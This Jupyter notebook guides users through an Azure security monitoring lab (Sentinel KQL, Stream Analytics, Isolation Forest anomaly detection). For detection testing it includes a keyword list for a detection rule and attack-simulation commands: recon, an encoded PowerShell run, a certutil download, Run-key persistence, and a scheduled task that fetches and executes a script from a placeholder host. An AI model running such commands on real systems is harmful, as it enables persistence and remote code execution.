# Azure Security Monitoring Lab - Getting Started

This notebook provides an overview of the deployed Azure Security Monitoring & Analytics Lab environment and guides you through initial exploration.

The lab is designed to showcase a modern, scalable architecture for collecting, processing, analyzing, and responding to security telemetry in Azure, utilizing key services like Azure Monitor Agent, Event Hubs, Stream Analytics, Log Analytics, Sentinel, Data Lake Storage, and Synapse Analytics.

## Lab Architecture

The high-level architecture involves multiple components working together for different data flows. Refer to the detailed diagram in the project root:

<img src="architecture_diagram.png" alt="Lab Architecture Diagram" width="150%" height="150%"/>


**Key Principles:**
*   **Azure Monitor Agent (AMA):** Primary collector for VM telemetry (OS logs, security events, performance, Sysmon) sent directly to Log Analytics.
*   **Event Hubs:** Serves as a scalable ingestion point for high-volume logs (e.g., from PaaS diagnostic settings or potentially other forwarders) before they undergo real-time processing.
*   **Stream Analytics:** Provides real-time filtering, enrichment, and detection on the Event Hubs stream, routing data appropriately (e.g., alerts to Log Analytics, raw data to ADLS).
*   **Log Analytics & Sentinel:** Core SIEM for storing curated logs (from AMA & ASA), running KQL-based detections, investigations, and hunting.
*   **ADLS Gen2 & Synapse:** Enables cost-effective long-term storage and powerful batch analytics/ML capabilities.

## Prerequisites

Before starting this lab, ensure you have:

1. **Azure Subscription:** An active Azure subscription with sufficient permissions (Contributor or Owner recommended).
2. **Local Environment:**
   - Azure CLI installed and logged in (`az login`).
   - PowerShell 5.1+.
   - Git.
   - Python 3.8+ with packages for *this notebook's ML section*: `numpy`, `pandas`, `scikit-learn`, `matplotlib` (`pip install numpy pandas scikit-learn matplotlib`).
3. **Lab Deployed:** You should have successfully run the `Deploy.ps1` script from your local terminal.
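
The local prerequisites above can be checked from the notebook kernel itself. The following is a minimal sketch, not part of the lab's scripts: the helper names (`missing_packages`, `missing_tools`, `python_ok`) are hypothetical, and it only checks that tools are on `PATH` and that packages are importable, not that `az login` has been completed.

```python
import importlib.util
import shutil
import sys

# pip name -> import name (they differ for scikit-learn).
REQUIRED_PACKAGES = {
    "numpy": "numpy",
    "pandas": "pandas",
    "scikit-learn": "sklearn",
    "matplotlib": "matplotlib",
}
REQUIRED_TOOLS = ["az", "git"]


def missing_packages(packages=REQUIRED_PACKAGES):
    """Return the pip names of packages this kernel cannot import."""
    return [
        pip_name
        for pip_name, import_name in packages.items()
        if importlib.util.find_spec(import_name) is None
    ]


def missing_tools(tools=REQUIRED_TOOLS):
    """Return the command-line tools that are not found on PATH."""
    return [tool for tool in tools if shutil.which(tool) is None]


def python_ok(minimum=(3, 8)):
    """Return True when the running interpreter meets the minimum version."""
    return sys.version_info[:2] >= minimum
```

Calling `missing_packages()` before the ML section shows which packages still need a `pip install` in the environment that backs this notebook's kernel, which may differ from the terminal's Python.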

## Deployed Components Overview

The `Deploy.ps1` script created the following core components (refer to `architecture_diagram.md` for relationships):

1.  **Resources (Core Infrastructure):**
    *   **Virtual Machine:** Windows Server VM generating logs.
    *   **Networking:** VNet, Subnet, NSG (allowing RDP from your specified IP).
    *   **Event Hubs Namespace & Hub:** For high-volume ingestion path.
    *   **Log Analytics Workspace:** Central store for AMA logs and filtered ASA output.
    *   **Microsoft Sentinel Instance:** SIEM layer on Log Analytics.
    *   **Azure Stream Analytics Job:** For real-time processing (requires manual configuration/start).
    *   **Azure Data Lake Storage (Gen2):** Storage account for ASA output / Synapse data.
    *   **Azure Synapse Workspace:** For batch analytics (includes Spark pool).
    *   **Key Vault:** Stores secrets (like VM password).
    *   **Managed Identity:** For secure service communication.

2.  **Collection & Configuration:**
    *   **Azure Monitor Agent (AMA):** Automatically installed on the VM.
    *   **Data Collection Rules (DCR):** Deployed via Bicep to configure AMA (Security Events, Perf, Sysmon, File/Registry changes).
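
One way to confirm that the components listed above exist is to compare the JSON output of `az resource list --resource-group <name> --output json` against the resource types you expect. The sketch below is illustrative only: `EXPECTED_TYPES` is an assumed mapping of the listed components to Azure resource types (Sentinel and the managed identity are left out because how they appear depends on the Bicep templates), and `missing_resource_types` is a hypothetical helper.

```python
import json

# Assumed resource types for the components listed above; adjust to your templates.
EXPECTED_TYPES = {
    "Microsoft.Compute/virtualMachines",
    "Microsoft.Network/virtualNetworks",
    "Microsoft.Network/networkSecurityGroups",
    "Microsoft.EventHub/namespaces",
    "Microsoft.OperationalInsights/workspaces",
    "Microsoft.StreamAnalytics/streamingjobs",
    "Microsoft.Storage/storageAccounts",
    "Microsoft.Synapse/workspaces",
    "Microsoft.KeyVault/vaults",
    "Microsoft.Insights/dataCollectionRules",
}


def missing_resource_types(resource_list_json, expected=EXPECTED_TYPES):
    """Return expected resource types absent from `az resource list` JSON output."""
    resources = json.loads(resource_list_json)
    # Compare case-insensitively, since type casing can vary between outputs.
    found = {resource.get("type", "").lower() for resource in resources}
    return sorted(t for t in expected if t.lower() not in found)
```

An empty list means every expected type was found at least once; it does not validate configuration such as DCR associations.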

In [5]:
# Verify Python Version & Azure CLI accessibility in terminal
# You should have already run 'az login' in your *terminal* before deploying.

import sys
import shutil

print(f"Python Version being used by this notebook kernel: {sys.version}")

# Check if Azure CLI command exists in PATH 
az_path = shutil.which('az')
if az_path:
    print(f"Azure CLI executable found at: {az_path}")
else:
    print("ERROR: Azure CLI command ('az') not found.")

Python Version being used by this notebook kernel: 3.12.2 (tags/v3.12.2:6abddd9, Feb  6 2024, 21:26:36) [MSC v.1937 64 bit (AMD64)]
Azure CLI executable found at: C:\Program Files\Microsoft SDKs\Azure\CLI2\wbin\az.CMD


## Step 1: Deploy Azure Infrastructure (via PowerShell/Terminal)

*(This step should already be completed before running this notebook)*

The lab infrastructure is defined using Azure Bicep and deployed using the `Deploy.ps1` PowerShell script from your local terminal.

**Example Deployment Command Used:**
```powershell
.\Deploy.ps1 -IpAddress "YOUR_PUBLIC_IP"
```

The script handles resource group creation/checking and deploys all components shown in the architecture diagram.
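
Because the `-IpAddress` value ends up in the NSG rule that allows RDP, it can help to validate it before deploying. The sketch below is an assumption-laden illustration: `build_deploy_command` is a hypothetical helper, and the rule that private addresses are rejected is my assumption about what the script expects, not something `Deploy.ps1` is known to enforce.

```python
import ipaddress


def build_deploy_command(ip_address, script_path=r".\Deploy.ps1"):
    """Validate the caller's public IP and return the PowerShell command as a list."""
    # ip_address() raises ValueError for anything that is not a valid IP.
    ip = ipaddress.ip_address(ip_address.strip())
    if ip.is_private:
        # Assumption: the NSG rule needs a public address to be useful for RDP.
        raise ValueError(f"{ip} is a private address; use your public IP")
    return ["powershell", "-File", script_path, "-IpAddress", str(ip)]
```

The returned list can be passed to `subprocess.run(...)` from a local terminal session, or simply printed and copied.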

## Step 2: Post-Deployment Verification (Azure Portal & Log Analytics)

After the deployment script finishes successfully (allow 15-30 mins), the Azure Monitor Agent (AMA) on the VM automatically starts collecting logs based on the deployed Data Collection Rules.

**Verify Data Collection in Log Analytics:**

1.  Navigate to the **Log Analytics Workspace** created by the deployment (name based on your prefix) in the Azure Portal.
2.  Go to the **Logs** blade.
3.  Wait 5-10 minutes for initial data ingestion.
4.  Run queries to check for incoming data. Examples:

    *   **Security Events:** `SecurityEvent | count` or `SecurityEvent | take 10`
    *   **Performance Data:** `Perf | where CounterName == "% Processor Time" and InstanceName == "_Total" | take 10`
    *   **Sysmon Events (if enabled):** `Event | where Source == "Microsoft-Windows-Sysmon" | take 10` (Note: Sysmon events might go to the generic `Event` table depending on DCR configuration).

If you don't see data, check the VM's AMA extension status in the Azure Portal under the VM's 'Extensions + applications' blade and review the Data Collection Rules associated with the VM.
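
The same verification queries can also be issued from a terminal with the Azure CLI instead of the portal. This is a sketch under assumptions: it only builds the command line for `az monitor log-analytics query` (which may require the CLI's `log-analytics` extension), `workspace_id` is the workspace's GUID rather than its name, and `build_query_command` is a hypothetical helper.

```python
import shutil

# The verification queries from the steps above.
VERIFICATION_QUERIES = {
    "SecurityEvent": "SecurityEvent | count",
    "Perf": 'Perf | where CounterName == "% Processor Time" and InstanceName == "_Total" | take 10',
    "Sysmon": 'Event | where Source == "Microsoft-Windows-Sysmon" | take 10',
}


def build_query_command(workspace_id, kql, az_executable=None):
    """Return an Azure CLI command (as a list) that runs one KQL query."""
    # On Windows the CLI is az.CMD, so resolve the full path when possible.
    az = az_executable or shutil.which("az") or "az"
    return [
        az, "monitor", "log-analytics", "query",
        "--workspace", workspace_id,
        "--analytics-query", kql,
        "--output", "json",
    ]
```

Each command can be run with `subprocess.run(cmd, capture_output=True, text=True)`; an empty result a few minutes after deployment usually just means ingestion has not caught up yet.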

## Step 3a: Explore Data & Detections (Log Analytics / Sentinel with KQL)

With AMA sending data to Log Analytics, you can use KQL for exploration, hunting, and creating detection rules in Sentinel.

1.  **Explore Log Analytics:** Use the **Logs** blade in the workspace to run KQL queries against tables like `SecurityEvent`, `Perf`, `Event` (for Sysmon/other logs), etc.
2.  **Configure Sentinel:** Navigate to the **Microsoft Sentinel** instance linked to the workspace.
    *   **Data Connectors:** Verify the 'Windows Security Events via AMA' connector shows as connected and collecting data.
    *   **Analytics:** Explore built-in templates or create custom scheduled query rules using KQL to detect threats based on the collected logs.
    *   **Workbooks:** Use workbooks for visualizing security data.
    *   **Hunting:** Proactively hunt for threats using KQL queries.

In [6]:
# Example KQL query for suspicious process creation (Run in Log Analytics/Sentinel Analytics Rule)
# This query searches the SecurityEvent table (EventID 4688) for suspicious patterns.

example_kql = '''\
// Detect suspicious process creations involving common LOLBINs and keywords
// Source: SecurityEvent (EventID 4688)
let lolbins = dynamic(["powershell.exe", "cmd.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"]);
let suspiciousKeywords = dynamic(["base64", "hidden", "downloadstring", "bypass", "-enc", "webclient", "invoke-expression", "iex", "schtasks", "-w hidden", "-nop", "-noni"]);
SecurityEvent
| where EventID == 4688 // Process Creation
| parse kind=relaxed CommandLine with * "-enc" encodedCommand // Simple parse for encoded commands
| extend Proc = tostring(NewProcessName),
         ParentProc = tostring(ParentProcessName),
         Cmd = tostring(CommandLine)
| where (Proc has_any (lolbins) and Cmd has_any (suspiciousKeywords))
        or (isnotempty(encodedCommand))
        or (Proc has "schtasks.exe" and Cmd has_any("powershell", "cmd.exe", "http:", "https:")) // Task creation with download/execution
| project TimeGenerated, Computer, SubjectUserName, ParentProc, Proc, Cmd, encodedCommand
| sort by TimeGenerated desc
'''

print("Example KQL query for detecting suspicious processes (run in Log Analytics or Sentinel):")
print(example_kql)

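
To reason about what the KQL rule above will and will not match before deploying it, its three conditions can be mirrored in plain Python and tried against sample command lines. This is only an approximation: `has_any` here is a case-insensitive substring test, whereas KQL's `has_any` matches on terms, and the encoded-command check is case-insensitive by assumption. The function names are hypothetical.

```python
LOLBINS = ["powershell.exe", "cmd.exe", "wmic.exe", "regsvr32.exe",
           "rundll32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"]
SUSPICIOUS_KEYWORDS = ["base64", "hidden", "downloadstring", "bypass", "-enc",
                       "webclient", "invoke-expression", "iex", "schtasks",
                       "-w hidden", "-nop", "-noni"]
TASK_PAYLOADS = ["powershell", "cmd.exe", "http:", "https:"]


def has_any(text, needles):
    """Case-insensitive substring match; a rough stand-in for KQL has_any."""
    lowered = text.lower()
    return any(needle in lowered for needle in needles)


def encoded_payload(command_line):
    """Return whatever follows '-enc' in the command line, or '' if absent."""
    index = command_line.lower().find("-enc")
    return command_line[index + len("-enc"):].strip() if index != -1 else ""


def is_suspicious(process_path, command_line):
    """Mirror the three OR-ed conditions of the KQL where clause."""
    return bool(
        (has_any(process_path, LOLBINS) and has_any(command_line, SUSPICIOUS_KEYWORDS))
        or encoded_payload(command_line)
        or (has_any(process_path, ["schtasks.exe"]) and has_any(command_line, TASK_PAYLOADS))
    )
```

Short keywords such as `iex` are likely to produce false positives with substring matching, which is one reason to tune the keyword list against real data before turning the query into an analytics rule.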

## Step 3b: Configure Real-Time Filtering/Detections (Azure Stream Analytics)

This is an **optional** step if you plan to use the Event Hubs path (e.g., by configuring Diagnostic Settings on PaaS resources to send to Event Hubs). The ASA job is deployed but **not started** and requires configuration.

**Purpose:** Use ASA to process high-volume streams from Event Hubs *before* they hit Log Analytics or long-term storage. Useful for:
*   Filtering out noisy or low-value events to save Log Analytics ingestion costs.
*   Enriching events with contextual data in real-time.
*   Performing simple, low-latency detections directly on the stream.
*   Routing different types of events to different destinations (e.g., alerts to LA, raw to ADLS).

**Configuration Steps (Azure Portal):**

1.  **Navigate to the ASA Job:** Find the deployed Stream Analytics job.
2.  **Configure Inputs:** Add an 'Event Hub' input, pointing to the deployed Event Hubs namespace and hub (e.g., `endpoint-logs`). Give it an alias (e.g., `rawStreamInput`). Use Managed Identity for authentication.
3.  **Configure Outputs:** Add outputs as needed:
    *   **Log Analytics:** To send filtered/alerted events to a custom table in the workspace.
    *   **Blob Storage / ADLS Gen2:** To archive raw or processed data.
    *   **Another Event Hub:** To chain processing.
    *   Give outputs aliases (e.g., `filteredToLA`, `archiveToADLS`).
4.  **Write the Query:** Use ASA's SQL-like query language. Read from the input alias, apply `WHERE` clauses for filtering or `SELECT` transformations, and send results `INTO` your output aliases.
5.  **Start the Job:** Once configured, start the ASA job.

In [7]:
# Example Azure Stream Analytics query (Write this in the ASA Job Query Editor in Azure portal)
# This example assumes logs coming into Event Hub follow a structure with 'Level' and 'EventID'.

example_asa_query = '''
-- Input Alias: rawStreamInput
-- Output Alias 1: filteredToLA (Log Analytics)
-- Output Alias 2: archiveToADLS (ADLS Gen2)

WITH ParsedEvents AS (
    SELECT 
        System.Timestamp AS EventTime, 
        GetRecordPropertyValue(EventData, 'Level') AS LogLevel, 
        GetRecordPropertyValue(EventData, 'Computer') AS ComputerName,
        GetRecordPropertyValue(EventData, 'ProviderName') AS ProviderName,
        GetRecordPropertyValue(EventData, 'EventID') AS EventID,
        EventData -- Keep the original record
    FROM 
        rawStreamInput -- Read from Event Hub input
)

-- Send Warning (3) and more severe events (Error = 2, Critical = 1) to Log Analytics.
-- Note: Level 0 (LogAlways) also satisfies this filter.
SELECT EventTime, LogLevel, ComputerName, ProviderName, EventID, EventData
INTO filteredToLA
FROM ParsedEvents
WHERE LogLevel <= 3 

-- Send ALL events to ADLS for archival
SELECT *
INTO archiveToADLS
FROM ParsedEvents
'''

print("Example Azure Stream Analytics Query (Configure in Azure Portal):")
print(example_asa_query)

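
The routing that the ASA query performs can be prototyped offline before the job is started. The sketch below simulates it in Python under assumptions: each incoming event is a dict with an `EventData` record carrying `Level`, `Computer`, `ProviderName`, and `EventID` (the same shape the query assumes), and `route_events` is a hypothetical helper that returns the two outputs as lists.

```python
def route_events(events, max_level=3):
    """Simulate the query: filtered events go to Log Analytics, all events to ADLS."""
    filtered_to_la, archive_to_adls = [], []
    for event in events:
        data = event.get("EventData", {})
        parsed = {
            "LogLevel": data.get("Level"),
            "ComputerName": data.get("Computer"),
            "ProviderName": data.get("ProviderName"),
            "EventID": data.get("EventID"),
            "EventData": data,  # keep the original record
        }
        # Every event is archived, matching SELECT * INTO archiveToADLS.
        archive_to_adls.append(parsed)
        # Events without a level are archived but never forwarded.
        level = parsed["LogLevel"]
        if level is not None and level <= max_level:
            filtered_to_la.append(parsed)
    return filtered_to_la, archive_to_adls
```

Running a representative sample through this function gives a rough idea of how much volume the `LogLevel <= 3` filter removes from the Log Analytics path.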



## Step 4: Batch Analytics & Anomaly Detection (Azure Synapse / ML Example)

This lab includes Azure Synapse Analytics for advanced batch processing, data warehousing, and ML tasks on large volumes of security data, typically sourced from ADLS Gen2.

**Example Use Cases:**
*   Training ML models (like the Isolation Forest below) on larger historical datasets stored in ADLS.
*   Performing complex ETL (Extract, Transform, Load) on logs.
*   Joining security data with threat intelligence feeds or asset inventories.
*   Running scheduled Spark jobs for periodic baseline analysis or anomaly detection.

This section demonstrates a *basic* ML anomaly detection example using **mock data** within this notebook. For real-world use, you would typically run such analysis within the Synapse environment using Spark notebooks against data in the linked ADLS account.

**Note:** Ensure you have `scikit-learn`, `pandas`, `numpy`, and `matplotlib` installed (`pip install scikit-learn pandas numpy matplotlib`).

In [8]:
# Example code for a simple anomaly detection model using Python (runnable in this notebook)
# In a real scenario, adapt this logic for a Synapse Spark notebook reading from ADLS.

import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore", category=UserWarning)  # Suppress non-critical UserWarnings (e.g., scikit-learn feature-name warnings)

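def load_mock_login_data(num_normal=190, num_anomaly=10):
    """Generate mock login data: weekday office-hours logins plus off-hours weekend anomalies."""
    np.random.seed(42)  # fixed seed keeps the mock data reproducible
    normal_hours = np.random.randint(8, 18, num_normal)  # 08:00-17:59
    normal_days = np.random.randint(0, 5, num_normal)    # Mon-Fri
    # Draw each anomalous hour independently from the full off-hours range
    # (0-7 and 18-23) rather than choosing between only two pre-drawn values.
    off_hours = np.concatenate([np.arange(0, 8), np.arange(18, 24)])
    anomaly_hours = np.random.choice(off_hours, num_anomaly)
    anomaly_days = np.random.randint(5, 7, num_anomaly)  # Sat-Sun
    hours = np.concatenate([normal_hours, anomaly_hours])
    days = np.concatenate([normal_days, anomaly_days])
    df = pd.DataFrame({'login_hour': hours, 'day_of_week': days})
    return df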

# Load mock data
mock_data = load_mock_login_data()
X = mock_data[['login_hour', 'day_of_week']]

# Train Isolation Forest
model = IsolationForest(n_estimators=100, contamination='auto', random_state=42)
model.fit(X)

# Predict anomalies (-1 for anomalies, 1 for normal)
mock_data['predicted_anomaly'] = model.predict(X)

# Visualize
plt.figure(figsize=(10, 6))
normal = mock_data[mock_data['predicted_anomaly'] == 1]
anomaly = mock_data[mock_data['predicted_anomaly'] == -1]
plt.scatter(normal['login_hour'], normal['day_of_week'], c='blue', label='Normal', alpha=0.6)
plt.scatter(anomaly['login_hour'], anomaly['day_of_week'], c='red', label='Anomaly', marker='x', s=100)
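# Build a grid over the feature space; keep the training column names so
# scikit-learn does not warn about missing feature names.
xx, yy = np.meshgrid(
    np.linspace(X['login_hour'].min() - 1, X['login_hour'].max() + 1, 50),
    np.linspace(X['day_of_week'].min() - 1, X['day_of_week'].max() + 1, 50),
)
grid = pd.DataFrame({'login_hour': xx.ravel(), 'day_of_week': yy.ravel()})
Z = model.decision_function(grid)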
Z = Z.reshape(xx.shape)
plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='black')
plt.contourf(xx, yy, Z, cmap=plt.cm.Blues_r, alpha=0.3)
plt.title('Anomaly Detection using Isolation Forest (Mock Login Data)')
plt.xlabel('Login Hour of Day')
plt.ylabel('Day of Week (0=Mon, 6=Sun)')
plt.legend()
plt.grid(True)
plt.show()

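
When moving from mock data to real sign-in logs, the two model features have to be derived from timestamps. The following is a small sketch of that step using only the standard library; it assumes ISO 8601 timestamp strings and a hypothetical helper name, `login_features`. `datetime.weekday()` returns 0 for Monday and 6 for Sunday, which matches the axis convention used in the plot.

```python
from datetime import datetime


def login_features(timestamps):
    """Turn ISO 8601 login timestamps into login_hour / day_of_week rows."""
    rows = []
    for ts in timestamps:
        moment = datetime.fromisoformat(ts)
        rows.append({
            "login_hour": moment.hour,        # 0-23
            "day_of_week": moment.weekday(),  # 0=Mon ... 6=Sun
        })
    return rows
```

The resulting list of dicts can be passed to `pd.DataFrame(...)` and then to the same `IsolationForest` workflow. Time zones are not handled here, so timestamps should be normalized to the users' local time first if working hours matter.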

## Step 5: Testing Detections (Generate Events on VM)

To test your detection rules (KQL in Sentinel, or ASA queries), you need events generated on the deployed VM. Run the following commands in a **PowerShell prompt on the VM** (connect via RDP using its Public IP) to simulate potentially suspicious activities. These events should be collected by AMA and appear in Log Analytics.

**Important:** Only run these on the lab VM.

In [None]:
# Example commands to run on the deployed Windows VM to generate test events

# Raw string: the Windows paths below contain backslashes (e.g. \updater.exe)
# that would otherwise be parsed as Python escape sequences.
test_commands = r'''
echo "--- Simulating Potentially Malicious Activity ---"

# --- Mimic Reconnaissance ---
echo "Running basic system info commands..."
whoami ; ipconfig /all ; systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ; net user ; net localgroup administrators
echo "Enumerating running processes..."
tasklist
echo "Checking network connections..."
netstat -ano

# --- Mimic Execution / LOLBINs ---
echo "Running PowerShell encoded command..."
$cmd = 'Write-Host "PS Encoded Test"' ; $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) ; $encoded = [Convert]::ToBase64String($bytes) ; powershell.exe -Enc $encoded
echo "Using certutil to download (harmless example)..."
certutil -urlcache -split -f https://raw.githubusercontent.com/PowerShell/PowerShell/master/LICENSE.txt C:\Windows\Temp\pstest.txt
echo "Running wmic process call create..."
wmic process call create "notepad.exe"

# --- Mimic Persistence ---
echo "Creating suspicious scheduled task (will likely fail)..." ; schtasks /create /tn "MalwareUpdate" /tr "powershell.exe -nop -w hidden -c 'iex ((new-object net.webclient).downloadstring(''http://1.2.3.4/update.ps1''))'" /sc DAILY /st 03:00 /F /RL HIGHEST
echo "Adding Run key persistence (HKCU, no elevation needed)..." ; reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MalwareUpdater" /t REG_SZ /d "C:\Windows\Temp\updater.exe" /f

# --- Mimic Credential Access ---
# PowerShell loop (the cmd.exe 'for /L' syntax does not run in a PowerShell prompt)
echo "Attempting failed logins..." ; 1..5 | ForEach-Object { net use \\localhost\C$ /user:fakeuser wrongpassword }
echo "Querying sensitive registry key (LSA - requires monitoring)..." ; reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
'''

print("Example commands to generate security events for testing (COPY AND RUN ON THE DEPLOYED VM):")
print(test_commands)
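
The encoded-command test above produces a Base64 string in the process command line, so it is useful to be able to decode what shows up in `SecurityEvent`. PowerShell's `-Enc` expects Base64 over UTF-16LE bytes (`[System.Text.Encoding]::Unicode`), which the sketch below reproduces in Python. The helper names are hypothetical.

```python
import base64


def encode_powershell_command(command):
    """Encode a command the way powershell.exe -Enc expects (Base64 of UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded):
    """Decode a Base64 -Enc payload captured from a process command line."""
    return base64.b64decode(encoded).decode("utf-16-le")
```

For example, `decode_powershell_command(...)` applied to the payload logged for the test command should return `Write-Host "PS Encoded Test"`.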

## Step 6: Clean-up Resources

When you are finished with the lab, **ensure you delete the deployed resources** to avoid incurring unnecessary Azure costs. Use the Azure CLI command below in your **local terminal** where you are logged in to Azure.

**Warning:** This command permanently deletes the entire resource group and all resources created within it.

In [None]:
# Command to clean up resources (Run in local PowerShell/terminal)

# IMPORTANT: Replace 'MalwareLab' if your final resource group name was different 
# (e.g., due to the timestamp logic if the original group wasn't empty)
# Check the deployment output or Azure portal for the exact resource group name.
resource_group_name = "MalwareLab" # <-- VERIFY THIS NAME

print(f"\nResource cleanup command (RUN IN LOCAL PowerShell/TERMINAL):")
print("#-----------------------------------------------------")
print(f"# WARNING: This will permanently delete '{resource_group_name}'")
print(f"az group delete --name {resource_group_name} --yes --no-wait") 
print("#-----------------------------------------------------")
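
Since the delete is irreversible, a light guard around the resource group name can catch typos before the command is copied into a terminal. This is a sketch only: `build_cleanup_command` is a hypothetical helper, and the pattern reflects Azure's documented resource group naming rules (1 to 90 characters; letters, digits, underscores, hyphens, periods, and parentheses; no trailing period) as I understand them.

```python
import re


def build_cleanup_command(resource_group_name):
    """Validate the name and return the az group delete command as a list."""
    name = resource_group_name.strip()
    if not re.fullmatch(r"[\w\-.()]{1,90}", name) or name.endswith("."):
        raise ValueError(f"Invalid resource group name: {resource_group_name!r}")
    # --yes skips the confirmation prompt; --no-wait returns immediately.
    return ["az", "group", "delete", "--name", name, "--yes", "--no-wait"]
```

Running `az group exists --name <name>` first is a cheap way to confirm that the name refers to the lab's resource group and not something else in the subscription.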

## Conclusion

This lab provides a platform to gain hands-on experience with a comprehensive Azure security monitoring architecture, including:

- Infrastructure deployment and automation (Bicep, PowerShell scripting).
- VM Telemetry collection via Azure Monitor Agent (AMA) and Data Collection Rules.
- High-volume data ingestion and routing using Event Hubs.
- Real-time filtering and detection with Stream Analytics.
- SIEM capabilities with Log Analytics and Microsoft Sentinel (KQL-based analysis).
- Long-term archival and batch processing using ADLS Gen2 and Azure Synapse Analytics.
- Secure credential management (Key Vault, Managed Identities).

Use the deployed environment to experiment with KQL queries, Sentinel rules, ASA queries, Synapse notebooks, and configuring diagnostic settings to understand how these services work together.